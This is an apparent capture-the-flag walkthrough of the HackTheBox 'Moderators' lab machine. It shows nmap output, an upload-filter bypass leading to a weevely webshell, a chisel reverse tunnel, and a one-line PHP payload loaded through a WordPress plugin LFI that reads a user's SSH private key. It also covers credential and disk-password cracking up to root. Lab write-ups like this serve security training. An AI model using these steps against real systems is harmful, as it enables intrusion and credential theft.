Summary

HackTheBox - Moderators is a Hard Linux machine that features a PHP web application that uses a library which is
vulnerable to file upload using which we can get a code execution by uploading a php file. Later we can find a Dev Version of the same application which is a wordpress application and had brandfolder plugin which was vulnerable to an LFI. using which we can upload a custom wp_load.php and execute to get user lexi. Updating wp admin credential we can get john user. From there it was all about mounting an encrypted vdi and getting root credential.

Author: kavigihan

Initial Scan

nmap

sql

# Nmap 7.92 scan initiated Sun Aug  7 08:50:28 2022 as: nmap -sC -sV -vvv -oN nmap/moderators 10.129.18.15
Increasing send delay for 10.129.18.15 from 0 to 5 due to 37 out of 123 dropped probes since last increase.
Nmap scan report for 10.129.18.15
Host is up, received echo-reply ttl 63 (0.16s latency).
Scanned at 2022-08-07 08:50:29 IST for 20s
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 39:03:16:06:11:30:a0:b0:c2:91:79:88:d3:93:1b:3e (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDVKTX9lrW0T2kgN/idXDQgowtSSGNJiULsNel0JKKX42GCLWDVSaDcZCcuPsxwxOYxSvEPmU8N7ZLka7rFJNBSbnlnfI4pP8r2ZYwB4Ioa+mJ7lkdmexkabiDupyue1hd2QNJ8mHjmPNd9LByhOq+CsXTdXe50qkhnSxil8inp8r4zAFDwWYCpjt2EeBKqqyWSlQptU+mjLfIP7903sUfLNhkKtEdEJfiGfpfd4QYCVWmqsWPD0q/S69/mDZ7Ic0Bhj4VVXVQkkxDIyG3NmNtY1dF/uxvB86Ca+q/bO0PUZ/PEI2EaoXydS5YVHb2ZxLy17ltoDC0JW+wogVe/+NV75tqOQESQfyqFTZOnpq2jBgrXq90FczUr1Rl/7JQZ4V5nt+asvhxFRs94qxidRdf60aP/Izgkg1UltttQCS4s984Lfnfmk1LVlJ74Q/QMZZIGdRf8HwZzqqW/zBLozU0FbSdq8kOXFhZDeLqCfrVLvBncD3fHjKj+h7gSq3nFbWk=
|   256 51:94:5c:59:3b:bd:bc:b6:26:7a:ef:83:7f:4c:ca:7d (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIEFsa05VSw1Z4FCOfBS4hGgxc7g6Z9Giortn/lxqktVOBrkAyUfJRs7AteBGqIyjHNOQJi97xMufArOj4vQJwU=
|   256 a5:6d:03:fa:6c:f5:b9:4a:a2:a1:b6:bd:bc:60:42:31 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIP3W656yOHPoAqoWckwZsh/ZzF1IX/9rN+LB9MkS56OI
80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Moderators
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Aug  7 08:50:49 2022 -- 1 IP address (1 host up) scanned in 21.62 seconds

Website

Running F

Reports in blog

Checking all the reports we find Logs path

where e21cece511f43a5cb18d4932429915ed look like a md5 hash lets put it in crackstation which result in the report id 9798

So it is possible that the other reports logs are also present in /logs/md5(reportId) paths

Checking that we see empty page for all the paths

We also saw /logs/uploads/ lets try file extensions on /logs/uploads/e21cece511f43a5cb18d4932429915ed and FUZZ that

After lots of Enumeration we find

Checking other logs

We also find

When we upload a pdf logs.pdf (I downloaded from the server itself)

We can find the file in

With some Magic Header we where able to Bypass the php check and upload a php file as

We see

We also see list of disabled functions

gauss

pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,passthru,system,exec,shell_exec

Using https://github.com/epinna/weevely3
we can get a Webshell on the server

Using Chisel we can pivot the system to access wp site

axapta

# Local Machine
./chisel server -p 3477 --reverse

axapta

## Server
./chisel client 10.10.14.20:3477 R:localhost:8080

Stuck on this for very long

Taking a break and coming back to it

Going to brandfolder

and reading the callback code again

We see we are concating the wp_abspath with wp-load and so on.

I was sure we could get LFI with https://www.exploit-db.com/exploits/39591
But passing nullbyte or anything i was unable to make it work

So I created a fake wp-load.php in /dev/shm
with content as

php

<?php echo fread(popen("cat /home/lexi/.ssh/id_rsa", "r"), 4096); ?>

and now opening brandfolder plugin with /dev/shm folder as LFI. it tried loading the
malicious wp-load.php and printed the user lexi Key.

Privilege Escalation

After Getting lexi lets run linpeas again.

Checking in WP database

We change the password for admin in wp_users
and login as admin

from there we can download the ssh key of john.

More Escalation

With the VDI downloaded we can crack the password using pyvboxdie-cracker as computer

And when we attach the vdi we see it to be an encrypted LUKS disk using cryptsetup-pwguess

cracking the password we get the password as abc123

And we the password in one of the script as

as $_THE_best_Sysadmin_Ever_

using which we get root